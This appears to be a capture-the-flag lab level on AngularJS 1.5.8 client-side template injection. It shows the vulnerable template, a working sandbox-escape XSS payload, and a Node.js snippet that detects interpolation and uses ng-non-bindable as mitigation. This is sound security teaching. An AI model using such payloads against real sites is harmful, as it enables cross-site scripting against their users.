Level 6: CSTI (AngularJS)
MISSION: Break out of the Angular 1.5.8 expression sandbox to execute arbitrary JS.
Authentication recognized for user: Guest
System status: {{ 'Online' }}
/// SOURCE CODE INSPECTOR ///
<!-- The page imports an old, vulnerable version of Angular -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.5.8/angular.min.js"></script>
<!-- The ng-app directive is placed on a div containing user input -->
<div class="box" ng-app>
<p>Authentication recognized for user: <strong><%= user_payload %></strong></p>
<p>System status: {{ 'Online' }}</p>
</div>
/// DECRYPTION COMPLETE ///
Because the vulnerable div carries the ng-app directive, AngularJS compiles everything inside it, including the server-rendered user_payload, and evaluates any expression it finds between double curly braces {{ }}. Angular 1.5.8 still runs expressions inside an expression sandbox, so to reach arbitrary JavaScript (and therefore XSS) we need a sandbox escape: a payload that walks up the prototype chain of a built-in object to reach the raw JavaScript execution environment.
Payload:
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join; $eval('x=alert(1)');}}
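As an added defensive example (not part of the challenge, and not the challenge's own code), the following Node.js snippet shows the two controls the vulnerable template is missing: logging any user value that carries Angular interpolation delimiters, and rendering user text with HTML escaping plus ng-non-bindable so AngularJS never compiles it. The function names and the benign sample value are assumptions; the hostile sample is the payload shown above.

```javascript
// Added defensive example (not the challenge's code). Two server-side
// controls for text that is rendered inside an ng-app scope. Runs in Node.js.

// AngularJS interpolation delimiters. Used only for logging/alerting:
// HTML entity encoding does NOT neutralise them, because the browser decodes
// &#123;&#123; back to {{ before AngularJS reads the text node.
const INTERPOLATION_RE = /\{\{[\s\S]*?\}\}/;

// Detection: does the user-controlled value contain an interpolation?
function containsInterpolation(input) {
  return INTERPOLATION_RE.test(String(input));
}

// Standard HTML escaping: stops markup injection, not template injection.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Mitigation: escape the value AND wrap it in ng-non-bindable, the AngularJS
// 1.x directive that stops the compiler from processing that element, so any
// {{ }} inside it stays literal text. The 1.5.8 sandbox is not a security
// boundary (AngularJS dropped it entirely in 1.6), so untrusted text must
// never reach the compiler at all.
function renderUserField(label, userInput) {
  return `<p>${label}: <strong ng-non-bindable>${escapeHtml(userInput)}</strong></p>`;
}

// Constructed sample inputs: an assumed benign username and the challenge payload.
const BENIGN_USER = 'Guest';
const CHALLENGE_PAYLOAD =
  "{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join; $eval('x=alert(1)');}}";

console.log('benign flagged:', containsInterpolation(BENIGN_USER));       // false
console.log('payload flagged:', containsInterpolation(CHALLENGE_PAYLOAD)); // true
console.log(renderUserField('Authentication recognized for user', CHALLENGE_PAYLOAD));
```

The regex is a coarse heuristic for alerting only; the fix that actually removes the bug is keeping untrusted text out of compiled Angular scope (ng-non-bindable, or not placing ng-app around server-rendered user data).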